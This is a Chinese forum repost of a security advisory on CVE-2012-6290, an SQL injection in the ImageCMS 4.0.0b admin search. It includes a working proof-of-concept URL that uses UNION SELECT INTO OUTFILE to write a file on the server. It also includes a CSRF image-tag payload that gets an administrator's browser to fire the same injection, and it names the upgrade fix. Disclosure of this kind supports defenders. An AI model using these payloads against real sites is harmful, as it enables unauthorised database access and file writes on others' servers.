灯火互联
管理员
管理员
  • 注册日期2011-07-27
  • 发帖数41778
  • QQ
  • 火币41290枚
  • 粉丝1086
  • 关注100
  • 终身成就奖
  • 最爱沙发
  • 忠实会员
  • 灌水天才奖
  • 贴图大师奖
  • 原创先锋奖
  • 特殊贡献奖
  • 宣传大使奖
  • 优秀斑竹奖
  • 社区明星
阅读:2063回复:0

ImageCMS 4.0.0b多重缺陷及修复

楼主#
更多 发布于:2013-01-29 13:54

影响产品: ImageCMS

开发者: www.imagecms.net

影响版本:4.0.0b 及以前Tested Version: 4.0.0b

缺陷类型: SQL Injection [CWE-89]

状态: 官方已修复

Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )  

 High-Tech Bridge Security Research Lab discovered vulnerability in ImageCMS, which can be exploited to perform SQL injection attacks.

 1)  SQL injection vulnerability in ImageCMS: CVE-2012-6290

 

The vulnerability exists due to insufficient filtration of the "q" HTTP GET parameter passed to "/admin/admin_search/". A remote authenticated administrator can execute arbitrary SQL commands in the application's database.

 

Depending on the database and system configuration PoC (Proof-of-Concept) code below will create "/tmp/file.txt" file with MySQL server version inside:

 http://www.atcpu.copm/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,1 2,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20--%202

This vulnerability can also be exploited by remote non-authenticated attacker via CSRF vector because the application is prone to Cross-Site Request Forgery attack. In order to do so attacker should trick a logged-in administrator to visit a web page with CSRF exploit.  

 

Basic CSRF exploit 示例  

 

<img src="http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,1 2,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20--%202">

 解决方案:

 升级至 ImageCMS 4.2

 

More Information:

http://forum.imagecms.net/viewtopic.php?id=1436

http://www.imagecms.net/blog/news/reliz-imagecms-42-razgranichenie-prav-dostupa-i-drugie-novinki


喜欢0 评分0
游客

返回顶部